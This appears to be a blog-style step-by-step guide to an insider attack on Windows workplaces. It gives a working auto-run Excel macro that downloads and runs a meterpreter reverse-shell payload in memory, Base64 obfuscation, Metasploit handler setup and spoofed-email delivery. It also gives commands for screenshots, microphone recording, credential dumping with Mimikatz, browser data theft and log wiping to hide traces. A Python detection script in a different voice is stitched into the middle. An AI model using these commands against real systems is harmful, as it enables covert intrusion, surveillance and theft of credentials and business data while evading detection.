Technical Guide for Insider Cyber Attacks

Danger can be at home

Bank Security
Dec 20, 2017

Attack Description

Possible Attack scenarios:

  • Insider employee who wants to exfiltrate business data in order to resell it
  • Competitor who wants to make another company look bad
  • Consultant who wants to sneak into the corporate network for malicious purposes
  • …for the glory

Attack scope:

  • Open a reverse shell on a target machine, bypassing standard anti-malware solutions by using in-memory PowerShell scripts
  • In-memory PowerShell remote command execution
  • Dump credentials, take screenshots, record audio, etc…

Possible Attack vectors:

  • Targeted phishing email that delivers a malicious document with an embedded macro
  • Rubber Ducky with a predefined autorun malicious PowerShell script
  • Files exchanged between the insider and a victim colleague
  • Any method that can execute code on the victim's machine…

In this article I will use a phishing email as the example.

STEP 1: Code writing

Create the CMD command string to execute on the target PC:

  • powershell.exe → run PowerShell on the victim machine (this also works with plain user privileges)
  • IEX (New-Object Net.WebClient) → Invoke-Expression applied to what a .NET WebClient object fetches; the WebClient picks up the system (Internet Explorer) proxy settings, so it gets through proxy authentication
  • DownloadString('https://HOSTING_SITE/Shellcode.ps1'); → download the PowerShell script from the remote host as a string
  • Invoke-Shellcode → invoke the script execution directly in memory on the local machine (nothing is written to disk) in order to bypass AV solutions
  • -Payload windows/meterpreter/reverse_https → set the payload that you want to use
  • -Lhost x.x.x.x → set the attacker machine's IP
  • -Lport 443 → set the port that the victim machine will contact on the attacker machine. Use 443 so the connection looks like ordinary HTTPS and passes the internal firewall.
  • -Force → declare "I know what I'm doing, and I'm sure I want to do this"

During this attack demonstration I downloaded the script directly from the PowerSploit GitHub repository in order to avoid network detection (you can also host the script directly on your Kali Linux machine in order to keep the communication from leaving for the internet). So the complete command that will be executed on the victim machine is the following:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"

STEP 2: Malicious Macro Code writing

In this step you need to embed the previous command in a VBA macro inside an Excel document:

  • Sub Auto_Open() → run the macro automatically when the workbook is opened
  • Call Shell("cmd.exe → run the local CMD
  • /c powershell.exe → run the command that launches PowerShell
  • -noexit → prevent the PowerShell console window from closing
  • "IEX (New-Object… → the previously created command
  • vbHide → hide the command window while the command executes
  • End Sub → end of the macro

So the complete VBA macro that you need to insert into the Excel document is the following:

Sub Auto_Open()
    ' Launch a hidden cmd.exe that starts PowerShell with the download cradle; "" escapes a quote inside a VBA string
    Call Shell("cmd.exe /c powershell.exe -noexit ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force""", vbHide)
End Sub

An example of the malicious Excel file:

Excel example with a fake encrypted table
VBA Macro code

VirusTotal detection at day 0:

Hybrid Analysis:

Any.Run Interactive Malware Analysis:

Although this malware has a simple structure and the code clearly reveals its malicious behaviour, the detection ratio at day 0 is very low. This highlights the first real security problem: vendors that rely only on signatures for their detection.

STEP 3: Simple Code Obfuscation (OPTIONAL)

You can encode the command text in simple ways:

Encoding the PowerShell command in Base64:

# Build the command string, encode it as UTF-16LE (what -EncodedCommand expects), then Base64 it
$command = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand >> output.txt

Example of the encoded command to execute:

powershell -ExecutionPolicy Bypass -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAB[…]=
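From the defender's side, the chain in STEP 1/2 and its Base64 form in STEP 3 leave the same evidence in process-creation telemetry: an Office parent, a cmd.exe/powershell.exe child and a command line that, once any -EncodedCommand argument is decoded from UTF-16LE Base64, contains the download-cradle strings. The following triage script is an added example, not code from the article; the Sysmon-style records are constructed, and HOSTING_SITE and x.x.x.x are placeholders.

```python
import base64
import binascii
import re

# Added detection example: score Sysmon Event ID 1 style records for the Excel -> cmd.exe
# -> powershell.exe download cradle, decoding -EncodedCommand first so the obfuscated form
# is matched on its decoded content rather than on the opaque Base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(  # strings present in the article's own commands
    r"new-object\s+net\.webclient|downloadstring|\biex\b|invoke-expression"
    r"|invoke-shellcode|invoke-mimikatz|invoke-wcmdump|get-timedscreenshot"
    r"|get-microphoneaudio|get-browserdata", re.I)
OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe")

# Constructed sample records (not real telemetry); HOSTING_SITE and x.x.x.x are placeholders.
CRADLE = ("IEX (New-Object Net.WebClient).DownloadString('https://HOSTING_SITE/Shellcode.ps1'); "
          "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force")
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": 'cmd.exe /c powershell.exe -noexit "' + CRADLE + '"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -encodedCommand " + ENCODED},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand argument, or None if absent or not valid Base64/UTF-16LE."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def assess(event):
    """Score one record: high = Office-spawned cradle, medium = cradle or Office-spawned shell."""
    decoded = decode_encoded_command(event["CommandLine"])
    text = event["CommandLine"] + ("\n" + decoded if decoded else "")
    indicators = sorted({m.lower() for m in CRADLE_RE.findall(text)})
    office_parent = event["ParentImage"].lower().rsplit("\\", 1)[-1] in OFFICE_APPS
    shell_child = event["Image"].lower().endswith(("cmd.exe", "powershell.exe"))
    severity = ("high" if indicators and office_parent else
                "medium" if indicators or (office_parent and shell_child) else "none")
    return {"severity": severity, "indicators": indicators,
            "office_parent": office_parent, "decoded": decoded}
```

Note that PowerShell accepts any unambiguous prefix of -EncodedCommand; the regex lists the common spellings and should be widened to match your environment's telemetry.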

You can also password-protect the VBA project in order to hinder a first-pass investigation:

Macro password protection

STEP 4: Configure KALI Linux

Because this is an insider attack, you can run a live Kali Linux or install it in a VM. The goal is to run the code on the victim machine without leaving traces that point back to the attacking machine, so choose whichever method you prefer.

I suggest you use a preconfigured virtual Kali Linux that you can delete immediately when necessary.

The msfconsole configuration steps are the following:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit

Starting msfconsole
Setting up exploit/multi/handler with the reverse HTTPS payload
Running exploit in order to start the HTTPS reverse handler

Remember that if you want to complete this attack without a detection event, you must use only these specific commands. If you try to use, for example, InitialAutoRunScript "migrate -f" or other scripts, the AV could detect them.

STEP 5: OSINT Reconnaissance (OPTIONAL)

If you know everything about your target you can skip this step.

In other cases, such as a phishing attack, you will have to find the most suitable victim to receive the email, or learn something more about the target.

In this example I show you how you can use a public tool named hunter.io to perform the reconnaissance phase. On GitHub and on the internet there are many different tools that can help you in this phase.

Kaspersky domain example results via the Hunter.io tool:

example purposes only

Link of the tool: https://hunter.io/search

STEP 6: Send the malicious email via a fake online mailer

In order to send the malicious email without configuring a mail server and exposing yourself unnecessarily, I suggest using an online fake mailer. On the internet there are many options you can use. Here you can find some examples:

Online fake mailer examples

Depending on the mailer used, the anti-spam services (based on reputation or other indicators) will block the email or let it pass. I advise you to run some tests before proceeding in order to find the ideal mailer for your target.

Link to the most famous fake mailer: https://emkei.cz/

Creating the phishing email:

example purposes only

STEP 7: Victim receives the email

Outlook online mail visualization example:

example purposes only

STEP 8: Waiting

At this point you just have to wait until:

  • The user clicks on "Enable Content"
  • The macro runs the malicious code silently
  • A session is opened

Here we are:

STEP 9: Actions on objective

Below you can find some examples of malicious command execution on Windows machines. Over the last few days I had the opportunity to test different enterprise and home antivirus solutions which, except one, miserably failed to detect and block the following types of advanced in-memory attacks.

Subsequently, the same tests were performed using the ATP (advanced threat protection) and EDR (endpoint detection and response) technologies of the various enterprise solutions. Thanks to these integrations it was possible to detect or block all, or only some, of the described attacks.

Write me if you need more details…

…Let’s start with the attacks:

Obtain Windows shell:

Take screenshots at a regular interval and save them to disk using an in-memory PowerShell script

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1'); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00"

Below you can find the screenshots saved in the specified folder:

Record audio from the microphone using the Windows API and save the output to a file on disk

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias 'SECRET'"

Dump credentials using in-memory PowerShell scripts

The standard Mimikatz tool, which dumps credentials without writing the Mimikatz binary to disk.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Mimikatz needs administrative privileges on the victim machine. If you don't want to use privilege escalation mechanisms, you can use other scripts such as:

WCMDump: a PowerShell script that dumps Windows credentials from the Credential Manager

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1'); Invoke-WCMDump"

Get browser data

Enumerates browser history and bookmarks for Chrome, Internet Explorer and/or Firefox on Windows machines:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Get-BrowserData.ps1'); Get-BrowserData"

Data Exfiltration — Download files

After executing the malicious commands and saving their outputs on the victim filesystem, you can download them with a simple command directly from meterpreter:

meterpreter > download <file name>

Using this method it is possible to download sensitive data from the victim machine, such as business documents or personal information.

STEP 10: Erase the traces

There are many tricks for deleting the traces of this activity. Here is a simple list:

  • Using the clearev meterpreter command it is possible to clear the Application, System and Security logs on a Windows system
  • Disconnect the Kali Linux machine
  • Save the output files on an encrypted USB drive
  • Delete the VM image from disk
  • Wipe the physical disk

Conclusion

PowerShell allows attackers to perform malicious actions without deploying any additional binary files, increasing the chances of spreading their threats further without being detected. The fact that PowerShell is installed by default makes the framework a favored attack tool.

With these attacks I showed you how simple it is to compromise a machine and bypass the standard security measures that are normally used in large companies. I hope this demonstration can help all security vendors to increase their detection capabilities, and all companies to realize that the "standard" security solutions used to date are not enough to detect these advanced attacks.

Could next-generation AVs be the solution? Surely it is an option that must be evaluated!

GitHub repository used for these attacks: